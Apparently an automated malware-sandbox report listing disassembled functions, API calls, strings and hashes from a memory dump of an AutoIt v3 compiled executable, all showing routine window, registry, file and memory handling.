Instruction ID: 50f00f5cbd40bca4f586f087b2f9392259a69fc79f8685ffb2499d1a8018bf97
Opcode Fuzzy Hash: b4cb991a97c7cc7feeddedc55a74ccebd4bf16c7ced93c7e79149a7717f1e74f
Instruction Fuzzy Hash: 4F81BBB2901B40CFD398DF2AA8456597BE5FB88306760952ED02EEB275F7F044C98F21

Uniqueness

Uniqueness Score: -1.00%

Function 00DB39D5, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32 ref: 00DB3A03
CreateWindowExW.USER32 ref: 00DB3A24
ShowWindow.USER32(00000000), ref: 00DB3A38
ShowWindow.USER32(00000000), ref: 00DB3A41

Strings

AutoIt v3, xrefs: 00DB39FB, 00DB3A00, 00DB3A01
edit, xrefs: 00DB3A1E

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 2f51ddcc81eb6f1bc48968cb87e3ab9492d9eb7c87ad83491a8452b59291cd31
Instruction ID: 3117b5c9f579ea57086c8ef66c240567f11327a21be1897e900c111915682f1e
Opcode Fuzzy Hash: 2f51ddcc81eb6f1bc48968cb87e3ab9492d9eb7c87ad83491a8452b59291cd31
Instruction Fuzzy Hash: BDF03A729002D47EEA3097236C0DE2B2E7DD7C6F50F00002EFA08B2271C6A10884DAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00E1955B, Relevance: 9.2, APIs: 6, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00DB4EE5: _fseek.LIBCMT ref: 00DB4EFD

Part of subcall function 00E19734: _wcscmp.LIBCMT ref: 00E19824
Part of subcall function 00E19734: _wcscmp.LIBCMT ref: 00E19837

_malloc.LIBCMT ref: 00E19656
_malloc.LIBCMT ref: 00E19660
_free.LIBCMT ref: 00E196A2
_free.LIBCMT ref: 00E196A9
_free.LIBCMT ref: 00E19714

Part of subcall function 00DD2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00DD9A24), ref: 00DD2D69
Part of subcall function 00DD2D55: GetLastError.KERNEL32(00000000,?,00DD9A24), ref: 00DD2D7B

_free.LIBCMT ref: 00E1971C

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$_malloc_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 2231465579-0
Opcode ID: 4074a69616a68aec4c23e3aa82ff7b4de26f84618e71ce6bc5783e8a9c299837
Instruction ID: 15df2e2fa5028d0efd9853a84386793ed1fc07ddd77778a239ee8a9c057d1be0
Opcode Fuzzy Hash: 4074a69616a68aec4c23e3aa82ff7b4de26f84618e71ce6bc5783e8a9c299837
Instruction Fuzzy Hash: 87512FB1904258ABDF25DF64DC81AEEBBB9EF48300F10449EB509A7352DB715A90CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00DB686A, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00DB4DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00E752F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00DB4E0F

_free.LIBCMT ref: 00DEE263
_free.LIBCMT ref: 00DEE2AA

Part of subcall function 00DB6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00DB6BAD

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00DEE039
Bad directive syntax error, xrefs: 00DEE292

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: 9335edc3615001e134ee978c0a50bbb76766e9ccacd7c81a311d5e30b1210b70
Instruction ID: e1a0f989a0d3313784f599d3dcc74154bf8b1ca744ddae2442aa2e1ff7d49854
Opcode Fuzzy Hash: 9335edc3615001e134ee978c0a50bbb76766e9ccacd7c81a311d5e30b1210b70
Instruction Fuzzy Hash: 70917871900259EFCF14EFA5D8819EDBBB8FF19310F14452AF816AB2A1DB70A945CB70

Uniqueness

Uniqueness Score: -1.00%

Function 00DB35B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00DB35A1,SwapMouseButtons,00000004,?), ref: 00DB35D4
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,00DB35A1,SwapMouseButtons,00000004,?,?,?,?,00DB2754), ref: 00DB35F5
RegCloseKey.KERNEL32(00000000,?,?,00DB35A1,SwapMouseButtons,00000004,?,?,?,?,00DB2754), ref: 00DB3617

Strings

Control Panel\Mouse, xrefs: 00DB35D2

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 849f746deca79a02ef6e8e18ffd08050142853fdac17c948a79726fe13954405
Instruction ID: 6dac5da2cff3517745fdec884732f368075f8cef5dd52361ce6cfd758ce2441f
Opcode Fuzzy Hash: 849f746deca79a02ef6e8e18ffd08050142853fdac17c948a79726fe13954405
Instruction Fuzzy Hash: 631148B5910208FFDB208F69DC84AEEBBB8EF04740F005469E806E7210D2719E44AB60

Uniqueness

Uniqueness Score: -1.00%

Function 00DB44A0, Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00DB44CF

Part of subcall function 00DB407C: _memset.LIBCMT ref: 00DB40FC
Part of subcall function 00DB407C: _wcscpy.LIBCMT ref: 00DB4150
Part of subcall function 00DB407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00DB4160

KillTimer.USER32(?,00000001,?,?), ref: 00DB4524
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00DB4533
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00DED4B9

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 1b600ad6dbfb953307196740fabe026f82b8975cd3d0e6cebda837528d610f9a
Instruction ID: 78e6697eb3061772fcd2ff36e07342760612d092a94daefe01c5d3e70007690b
Opcode Fuzzy Hash: 1b600ad6dbfb953307196740fabe026f82b8975cd3d0e6cebda837528d610f9a
Instruction Fuzzy Hash: 6D21D770904B889FE732DB258859BE6BBEC9F15314F08009EE6DE56182C7746988CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00DB4C70, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

Part of subcall function 00DD0DB6: _malloc.LIBCMT ref: 00DD0DCE

_memmove.LIBCMT ref: 00DB4CBA

Strings

AU3!P/, xrefs: 00DB4CB4
EA06, xrefs: 00DED8CC

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _malloc_memmove
String ID: AU3!P/$EA06
API String ID: 1183979061-182974850
Opcode ID: cc957d0046c0a7a72c84518cb7cbc38569ff9a8e6b5f8014a0734992c8a71d26
Instruction ID: f0ace6e066d30fc8d5124d109b0098c2c2ee8f23ba296f6334f2eb26bcce4985
Opcode Fuzzy Hash: cc957d0046c0a7a72c84518cb7cbc38569ff9a8e6b5f8014a0734992c8a71d26
Instruction Fuzzy Hash: 0E411822A04158EBDF21DB64C8A17FE7FA6DB45310F6C4465EC87AB287DA20DD4483B1

Uniqueness

Uniqueness Score: -1.00%

Function 00DB7285, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00DEEA39
GetOpenFileNameW.COMDLG32(?), ref: 00DEEA83

Part of subcall function 00DB4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DB4743,?,?,?,00DB715A,?,?,?,?,00DB108C), ref: 00DB4770

Part of subcall function 00DD0791: GetLongPathNameW.KERNEL32 ref: 00DD07B0

Strings

X, xrefs: 00DEEA51

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 57933ab86acde9128bceb6b0641489d99eb9ede3d373c8bf68e9fc532686211d
Instruction ID: a09532a13f9e38fab8d74556fe343a8cb2958d401181a9022b98d53256335f3e
Opcode Fuzzy Hash: 57933ab86acde9128bceb6b0641489d99eb9ede3d373c8bf68e9fc532686211d
Instruction Fuzzy Hash: FC21C331A002889BCB01DF95D845BEE7BF9EF88314F00405AE449BB241DFB49989CFB1

Uniqueness

Uniqueness Score: -1.00%

Function 00DC092D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00DB3C14,00E752F8,?,?,?), ref: 00DC096E

Part of subcall function 00DB7BCC: _memmove.LIBCMT ref: 00DB7C06

_wcscat.LIBCMT ref: 00DF4CB7

Strings

S, xrefs: 00DC09AE

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FullNamePath_memmove_wcscat
String ID: S
API String ID: 257928180-3334745618
Opcode ID: 7d9de50112130cbcbff2cb4c181d114aebd7becdf8bf812871f024c0f9b44487
Instruction ID: ffd112d913e3567705124c28bb194c0d580d59c84bbb5b62116bc306a854e611
Opcode Fuzzy Hash: 7d9de50112130cbcbff2cb4c181d114aebd7becdf8bf812871f024c0f9b44487
Instruction Fuzzy Hash: 2411A531A0520AEB9B00FB64CC46FDD77A8EF48340B0484A9B949E7295EEB0D6848F34

Uniqueness

Uniqueness Score: -1.00%

Function 00DD0DB6, Relevance: 4.5, APIs: 3, Instructions: 44COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00DD0DCE

Part of subcall function 00DD571C: __FF_MSGBANNER.LIBCMT ref: 00DD5733
Part of subcall function 00DD571C: __NMSG_WRITE.LIBCMT ref: 00DD573A
Part of subcall function 00DD571C: RtlAllocateHeap.NTDLL(01550000,00000000,00000001,00000000,?,?,?,00DD0DD3,?), ref: 00DD575F

std::exception::exception.LIBCMT ref: 00DD0DEC
__CxxThrowException@8.LIBCMT ref: 00DD0E01

Part of subcall function 00DD859B: RaiseException.KERNEL32(?,?,?,00E69E78,00000000,?,?,?,?,00DD0E06,?,00E69E78,?,00000001), ref: 00DD85F0

Part of subcall function 00DD84D1: _free.LIBCMT ref: 00DD857E

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrow_free_mallocstd::exception::exception
String ID:
API String ID: 3712093317-0
Opcode ID: 6ea6b9b970b1cb36cbf8dea551eb5ad698bceb8ba18b6534e287020f70df1aea
Instruction ID: 1e2ee1ecd9f39a869e7339fac552d4b5fbde25b2be14be7409e517f42626ba51
Opcode Fuzzy Hash: 6ea6b9b970b1cb36cbf8dea551eb5ad698bceb8ba18b6534e287020f70df1aea
Instruction Fuzzy Hash: 44F0AF3190031A66CB11BAA8FC02ADEBBADDF41351F14042BF908A6781DFB19A90D6F1

Uniqueness

Uniqueness Score: -1.00%

Function 00E189A9, Relevance: 4.5, APIs: 3, Instructions: 32COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00E189B3

Part of subcall function 00DD571C: __FF_MSGBANNER.LIBCMT ref: 00DD5733
Part of subcall function 00DD571C: __NMSG_WRITE.LIBCMT ref: 00DD573A
Part of subcall function 00DD571C: RtlAllocateHeap.NTDLL(01550000,00000000,00000001,00000000,?,?,?,00DD0DD3,?), ref: 00DD575F

_malloc.LIBCMT ref: 00E189C7
_malloc.LIBCMT ref: 00E189DB

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _malloc$AllocateHeap
String ID:
API String ID: 680241177-0
Opcode ID: f381f201150e1180bcf7dce2d446f3a0bc3834f83c788d0b3abf017540c8d7e6
Instruction ID: a31a882b8aff47c91908775b3409b4dbace33091af6afb21a125d27ba0892e7a
Opcode Fuzzy Hash: f381f201150e1180bcf7dce2d446f3a0bc3834f83c788d0b3abf017540c8d7e6
Instruction Fuzzy Hash: F3F0E5B2301B917BD7146BB06990BEEAA98DFC4350F14252FF544DB242CFB49CC143A9

Uniqueness

Uniqueness Score: -1.00%

Function 00E18D0D, Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00E18D1B

Part of subcall function 00DD2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00DD9A24), ref: 00DD2D69
Part of subcall function 00DD2D55: GetLastError.KERNEL32(00000000,?,00DD9A24), ref: 00DD2D7B

_free.LIBCMT ref: 00E18D2C
_free.LIBCMT ref: 00E18D3E

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction ID: 0dfd70807dc20e1a9fc63cf8b333ef4e9343e695eeced4e3c26c4750839df46f
Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction Fuzzy Hash: 16E012B160170146CB24A578BA40AE313DD8F69356714191EB40DE7286CEA4F8828174

Uniqueness

Uniqueness Score: -1.00%

Function 00E1625D, Relevance: 3.2, APIs: 2, Instructions: 216COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E16331
_memmove.LIBCMT ref: 00E1634F

Part of subcall function 00E164B8: _memmove.LIBCMT ref: 00E16546

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 053b6d1d4cb072f4e8e2465d9635f3cb765de6f1275d73824105a93fd3fd2383
Instruction ID: 3e57ab0951d1698194d289d61349f2fdef91f9a8494cf235e3635aaa5aea0e90
Opcode Fuzzy Hash: 053b6d1d4cb072f4e8e2465d9635f3cb765de6f1275d73824105a93fd3fd2383
Instruction Fuzzy Hash: FE71B171200614DBCB249F14D955AFAB7B5FF85368F24980DE8A66B292CB31AD81CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00E177B3, Relevance: 3.1, APIs: 2, Instructions: 133COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E178DB

Part of subcall function 00DD0DB6: _malloc.LIBCMT ref: 00DD0DCE

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _malloc_memmove
String ID:
API String ID: 1183979061-0
Opcode ID: 2972bc1910544f9f09faf747f65529b5e43baf7a1b3519bb464f52acbf780907
Instruction ID: cba0250d13d3ea99aa7b42ae1891faa6804fe411a92f7bd5adb0d8e93f7fad27
Opcode Fuzzy Hash: 2972bc1910544f9f09faf747f65529b5e43baf7a1b3519bb464f52acbf780907
Instruction Fuzzy Hash: 6D41F2719082149BCB04EFA8D885AFABBB9EF49704F24545AF1C5A7382DF34AC41CB70

Uniqueness

Uniqueness Score: -1.00%

Function 00DB7A51, Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00DB7AAB
_memmove.LIBCMT ref: 00DB7B16

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 0323a77de9f9f125283f9f3eac0b647bd9c1fd2c8af7472a6d701d539f1455ed
Instruction ID: 1847c20791c9ca07a26f26b73d52bb78ff2d911903bbc5c530df74bd561513e2
Opcode Fuzzy Hash: 0323a77de9f9f125283f9f3eac0b647bd9c1fd2c8af7472a6d701d539f1455ed
Instruction Fuzzy Hash: EC318BB1604506EFC744DF68C8D1E69F7A9FF84310B15862AE51ACB791DB30E950CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00DB47D0, Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00DB4834

Part of subcall function 00DD336C: __lock.LIBCMT ref: 00DD3372
Part of subcall function 00DD336C: DecodePointer.KERNEL32(00000001,?,00DB4849,00E07C74), ref: 00DD337E
Part of subcall function 00DD336C: EncodePointer.KERNEL32(?,?,00DB4849,00E07C74), ref: 00DD3389

Part of subcall function 00DB48FD: SystemParametersInfoW.USER32 ref: 00DB4915
Part of subcall function 00DB48FD: SystemParametersInfoW.USER32 ref: 00DB492A

Part of subcall function 00DB3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00DB3B68
Part of subcall function 00DB3B3A: IsDebuggerPresent.KERNEL32 ref: 00DB3B7A
Part of subcall function 00DB3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,00E752F8,00E752E0,?,?), ref: 00DB3BEB
Part of subcall function 00DB3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00DB3C6F

SystemParametersInfoW.USER32 ref: 00DB4874

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 06071f924e0d2c089f22b5b066195d624f353337296e463c95249766140aaad0
Instruction ID: 4af3ee939b77c88e80c35d5ae9a7d192d1259fd9575a1116568ef4af2772da2f
Opcode Fuzzy Hash: 06071f924e0d2c089f22b5b066195d624f353337296e463c95249766140aaad0
Instruction Fuzzy Hash: 43116D719047859FC700DF2AD84594ABFF8EB85750F10491FF149A32B2DBB09589CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00DB5C99, Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00DB5821,?,?,?,?), ref: 00DB5CC7
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00DB5821,?,?,?,?), ref: 00DEDD73

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 26f7a86033d94dce36bdee281de913f7ebbe727a6e5c799ccec0d4594c4ac512
Instruction ID: 4c55f2aea8a6ba2debef8543cc5dd74f45c073a20caac4aa0461814542e242c5
Opcode Fuzzy Hash: 26f7a86033d94dce36bdee281de913f7ebbe727a6e5c799ccec0d4594c4ac512
Instruction Fuzzy Hash: CD018470144748FEF3201E25DC8AFB67BDDAB05768F248315BAE5AA1E0C6B45C488B60

Uniqueness

Uniqueness Score: -1.00%

Function 00DD53A6, Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 00DD8B28: __getptd_noexit.LIBCMT ref: 00DD8B28

__lock_file.LIBCMT ref: 00DD53EB

Part of subcall function 00DD6C11: __lock.LIBCMT ref: 00DD6C34

__fclose_nolock.LIBCMT ref: 00DD53F6

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: b7dda20aa5a0a0ffec1593202cde375626ad503ee2c6f4f75a41390beabae453
Instruction ID: e02e9adb4720dceddf8431d580496427e6d3d06672aea35d9178bbbd5277e33b
Opcode Fuzzy Hash: b7dda20aa5a0a0ffec1593202cde375626ad503ee2c6f4f75a41390beabae453
Instruction Fuzzy Hash: 7BF09671800A04DAD7116B65A8057AD77A0AF41374F258207A464AB3C5CBBC99416F72

Uniqueness

Uniqueness Score: -1.00%

Function 00DB77DA, Relevance: 2.6, APIs: 2, Instructions: 54COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000001,?,00000001,00000000,00000000,?,?,?,00DB5474,?,?,?,?,?), ref: 00DB77F0

Part of subcall function 00DD0DB6: _malloc.LIBCMT ref: 00DD0DCE

MultiByteToWideChar.KERNEL32(00000000,00000001,?,00000001,00000000,?,?,?,00DB5474,?,?,?,?,?), ref: 00DB7820

Part of subcall function 00DB774D: _memmove.LIBCMT ref: 00DB7789

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide$_malloc_memmove
String ID:
API String ID: 961785871-0
Opcode ID: 32ada5bc823086429e024f9d55c05650edb4d1e79ac84a4937d9e180fd9cd3b6
Instruction ID: 9f62ac47de6c8e8fd29a3c8482fad393fd06b6cb88f352069693c485934ccd77
